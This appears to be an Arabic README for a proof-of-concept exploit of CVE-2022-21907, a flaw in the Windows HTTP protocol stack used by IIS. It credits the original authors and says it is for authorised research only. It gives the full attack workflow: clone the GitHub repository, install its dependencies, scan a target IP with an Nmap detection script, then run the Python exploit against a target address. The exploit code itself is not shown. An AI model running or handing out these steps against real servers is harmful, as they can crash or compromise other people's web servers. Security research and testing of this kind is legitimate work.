
استغلال إثبات المفهوم لـ CVE-2022-21907، ثغرة تنفيذ التعليمات البرمجية عن بُعد في حزمة بروتوكول HTTP (IIS). يتضمن سكربت Python وسكربت Nmap للكشف والاستغلال.
⚠️ لأغراض البحث الأمني التعليمي والمصرح به فقط
شكر جزيل لمؤلف الإثبات المفاهيمي الأصلي NU11SECURITY و michelep
ثغرة تنفيذ الأوامر عن بُعد في مكدس بروتوكول HTTP. هذه الثغرة قد تسبب هجوم حجب الخدمة على النظام المستهدف الذي يحتوي على خادم ويب IIS.
قم بتثبيت git، ثم استنساخ الإثبات المفاهيمي من مستودع github:
sudo apt install git -y
git clone https://github.com/asepsaepdin/CVE-2022-21907.git
قم بتثبيت المتطلبات باستخدام الأمر pip3:
sudo apt install python3-pip -y
cd CVE-2022-21907
pip3 install -r requirements.txt
تحقق من وجود الثغرة في الجهاز الهدف باستخدام الأمر:
nmap -p 80 --script dos_iis_2022_21907 10.10.10.1
ثم، قم بتشغيل نصوص الإثبات المفاهيمي باستخدام الأمر:
python3 CVE-2022-21907.py -i 10.10.1.10
ملاحظات: حدد خيار -i مع عنوان IP الهدف